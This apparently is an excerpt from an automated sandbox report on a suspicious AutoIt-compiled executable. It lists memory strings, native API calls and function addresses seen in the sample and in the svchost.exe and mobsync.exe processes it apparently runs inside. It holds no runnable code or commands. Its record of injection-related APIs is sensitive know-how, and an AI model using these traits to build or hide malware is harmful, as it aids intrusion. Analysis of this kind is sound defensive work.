Source: AxKxwW9WGa.exe, 00000000.00000000.1479092972.00000000004F4000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_c250a029-1
Source: AxKxwW9WGa.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_91bd9536-e
Source: AxKxwW9WGa.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_492ffce0-7

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042C483 NtClose,	2_2_0042C483
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B60 NtClose,LdrInitializeThunk,	2_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033735C0 NtCreateMutant,LdrInitializeThunk,	2_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374340 NtSetContextThread,	2_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03374650 NtSuspendThread,	2_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BA0 NtEnumerateValueKey,	2_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372B80 NtQueryInformationFile,	2_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BF0 NtAllocateVirtualMemory,	2_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372BE0 NtQueryValueKey,	2_2_03372BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AB0 NtWaitForSingleObject,	2_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AF0 NtWriteFile,	2_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372AD0 NtReadFile,	2_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F30 NtCreateSection,	2_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F60 NtCreateProcessEx,	2_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FB0 NtResumeThread,	2_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FA0 NtQuerySection,	2_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372F90 NtProtectVirtualMemory,	2_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372FE0 NtCreateFile,	2_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E30 NtWriteVirtualMemory,	2_2_03372E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EA0 NtAdjustPrivilegesToken,	2_2_03372EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372E80 NtReadVirtualMemory,	2_2_03372E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372EE0 NtQueueApcThread,	2_2_03372EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D30 NtUnmapViewOfSection,	2_2_03372D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D10 NtMapViewOfSection,	2_2_03372D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372D00 NtSetInformationFile,	2_2_03372D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DB0 NtEnumerateKey,	2_2_03372DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372DD0 NtDelayExecution,	2_2_03372DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C00 NtQueryInformationProcess,	2_2_03372C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C70 NtFreeVirtualMemory,	2_2_03372C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372C60 NtCreateKey,	2_2_03372C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CA0 NtQueryInformationToken,	2_2_03372CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CF0 NtOpenProcess,	2_2_03372CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03372CC0 NtQueryVirtualMemory,	2_2_03372CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373010 NtOpenDirectoryObject,	2_2_03373010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373090 NtSetValueKey,	2_2_03373090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033739B0 NtGetContextThread,	2_2_033739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D10 NtOpenProcessToken,	2_2_03373D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03373D70 NtOpenThread,	2_2_03373D70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF4650 NtSuspendThread,LdrInitializeThunk,	5_2_04CF4650
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF4340 NtSetContextThread,LdrInitializeThunk,	5_2_04CF4340
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_04CF2CA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2C60 NtCreateKey,LdrInitializeThunk,	5_2_04CF2C60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_04CF2C70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2DD0 NtDelayExecution,LdrInitializeThunk,	5_2_04CF2DD0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_04CF2DF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_04CF2D10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_04CF2D30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2EE0 NtQueueApcThread,LdrInitializeThunk,	5_2_04CF2EE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2FE0 NtCreateFile,LdrInitializeThunk,	5_2_04CF2FE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2FB0 NtResumeThread,LdrInitializeThunk,	5_2_04CF2FB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2F30 NtCreateSection,LdrInitializeThunk,	5_2_04CF2F30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2AD0 NtReadFile,LdrInitializeThunk,	5_2_04CF2AD0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2AF0 NtWriteFile,LdrInitializeThunk,	5_2_04CF2AF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2B60 NtClose,LdrInitializeThunk,	5_2_04CF2B60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF35C0 NtCreateMutant,LdrInitializeThunk,	5_2_04CF35C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF39B0 NtGetContextThread,LdrInitializeThunk,	5_2_04CF39B0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2CC0 NtQueryVirtualMemory,	5_2_04CF2CC0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2CF0 NtOpenProcess,	5_2_04CF2CF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2C00 NtQueryInformationProcess,	5_2_04CF2C00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2DB0 NtEnumerateKey,	5_2_04CF2DB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2D00 NtSetInformationFile,	5_2_04CF2D00
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2E80 NtReadVirtualMemory,	5_2_04CF2E80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2EA0 NtAdjustPrivilegesToken,	5_2_04CF2EA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2E30 NtWriteVirtualMemory,	5_2_04CF2E30
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2F90 NtProtectVirtualMemory,	5_2_04CF2F90
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2FA0 NtQuerySection,	5_2_04CF2FA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2F60 NtCreateProcessEx,	5_2_04CF2F60
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2AB0 NtWaitForSingleObject,	5_2_04CF2AB0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2BE0 NtQueryValueKey,	5_2_04CF2BE0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2BF0 NtAllocateVirtualMemory,	5_2_04CF2BF0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2B80 NtQueryInformationFile,	5_2_04CF2B80
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF2BA0 NtEnumerateValueKey,	5_2_04CF2BA0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF3090 NtSetValueKey,	5_2_04CF3090
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF3010 NtOpenDirectoryObject,	5_2_04CF3010
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF3D70 NtOpenThread,	5_2_04CF3D70
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CF3D10 NtOpenProcessToken,	5_2_04CF3D10
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC9270 NtReadFile,	5_2_02CC9270
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC9370 NtDeleteFile,	5_2_02CC9370
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC9100 NtCreateFile,	5_2_02CC9100
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_02CC9410 NtClose,	5_2_02CC9410

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_004AA1EF

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_00498310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00498310

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_004A51BD

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0044E6A0	0_2_0044E6A0
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046D975	0_2_0046D975
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0044FCE0	0_2_0044FCE0
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004621C5	0_2_004621C5
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004762D2	0_2_004762D2
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004C03DA	0_2_004C03DA
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0047242E	0_2_0047242E
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004625FA	0_2_004625FA
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0049E616	0_2_0049E616
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004566E1	0_2_004566E1
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0047878F	0_2_0047878F
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00476844	0_2_00476844
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004C0857	0_2_004C0857
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00458808	0_2_00458808
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004A8889	0_2_004A8889
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046CB21	0_2_0046CB21
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00476DB6	0_2_00476DB6
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00456F9E	0_2_00456F9E
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00453030	0_2_00453030
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046F1D9	0_2_0046F1D9
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00463187	0_2_00463187
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00441287	0_2_00441287
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00461484	0_2_00461484
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00455520	0_2_00455520
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00467696	0_2_00467696
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00455760	0_2_00455760
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00461978	0_2_00461978
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00479AB5	0_2_00479AB5
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_004C7DDB	0_2_004C7DDB
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00461D90	0_2_00461D90
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046BDA6	0_2_0046BDA6
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0044DF00	0_2_0044DF00
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00453FE0	0_2_00453FE0
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_00B08B18	0_2_00B08B18
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004183B3	2_2_004183B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402929	2_2_00402929
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402930	2_2_00402930
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401200	2_2_00401200
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042EAA3	2_2_0042EAA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FBF3	2_2_0040FBF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402DF0	2_2_00402DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DDF3	2_2_0040DDF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402590	2_2_00402590
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004165B3	2_2_004165B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FE13	2_2_0040FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF43	2_2_0040DF43
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040DF37	2_2_0040DF37
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA352	2_2_033FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034003E6	2_2_034003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334E3F0	2_2_0334E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0274	2_2_033E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C02C0	2_2_033C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DA118	2_2_033DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330100	2_2_03330100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C8158	2_2_033C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F41A2	2_2_033F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034001AA	2_2_034001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F81CC	2_2_033F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D2000	2_2_033D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340770	2_2_03340770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364750	2_2_03364750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333C7C0	2_2_0333C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335C6E0	2_2_0335C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340535	2_2_03340535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03400591	2_2_03400591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4420	2_2_033E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F2446	2_2_033F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EE4F6	2_2_033EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F6BD7	2_2_033F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340A9A6	2_2_0340A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334A840	2_2_0334A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033268B8	2_2_033268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E8F0	2_2_0336E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360F30	2_2_03360F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E2F30	2_2_033E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03382F28	2_2_03382F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B4F40	2_2_033B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BEFA0	2_2_033BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334CFE0	2_2_0334CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332FC8	2_2_03332FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEE26	2_2_033FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340E59	2_2_03340E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352E90	2_2_03352E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FCE93	2_2_033FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FEEDB	2_2_033FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DCD1F	2_2_033DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334AD00	2_2_0334AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03358DBF	2_2_03358DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333ADE0	2_2_0333ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340C00	2_2_03340C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E0CB5	2_2_033E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330CF2	2_2_03330CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F132D	2_2_033F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332D34C	2_2_0332D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0338739A	2_2_0338739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033452A0	2_2_033452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E12ED	2_2_033E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B2C0	2_2_0335B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0340B16B	2_2_0340B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332F172	2_2_0332F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337516C	2_2_0337516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0334B1B0	2_2_0334B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F70E9	2_2_033F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF0E0	2_2_033FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EF0CC	2_2_033EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033470C0	2_2_033470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF7B0	2_2_033FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385630	2_2_03385630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F16CC	2_2_033F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7571	2_2_033F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DD5B0	2_2_033DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FF43F	2_2_033FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03331460	2_2_03331460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFB76	2_2_033FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FB80	2_2_0335FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B5BF0	2_2_033B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337DBF9	2_2_0337DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B3A6C	2_2_033B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFA49	2_2_033FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7A46	2_2_033F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DDAAC	2_2_033DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03385AA0	2_2_03385AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E1AA3	2_2_033E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EDAC6	2_2_033EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D5910	2_2_033D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349950	2_2_03349950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335B950	2_2_0335B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AD800	2_2_033AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033438E0	2_2_033438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFF09	2_2_033FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFFB1	2_2_033FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03341F92	2_2_03341F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03349EB0	2_2_03349EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F7D73	2_2_033F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F1D5A	2_2_033F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03343D40	2_2_03343D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335FDC0	2_2_0335FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B9C32	2_2_033B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FFCF2	2_2_033FFCF2
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F95209	4_2_03F95209
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F951F6	4_2_03F951F6
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F970D9	4_2_03F970D9
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9D879	4_2_03F9D879
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F96EB9	4_2_03F96EB9
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03F9F5D5	4_2_03F9F5D5
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	Code function: 4_2_03FB5D69	4_2_03FB5D69
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D6E4F6	5_2_04D6E4F6
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D72446	5_2_04D72446
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D64420	5_2_04D64420
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D80591	5_2_04D80591
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC0535	5_2_04CC0535
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CDC6E0	5_2_04CDC6E0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CBC7C0	5_2_04CBC7C0
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CE4750	5_2_04CE4750
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04CC0770	5_2_04CC0770
Source: C:\Windows\SysWOW64\mobsync.exe	Code function: 5_2_04D52000	5_2_04D52000
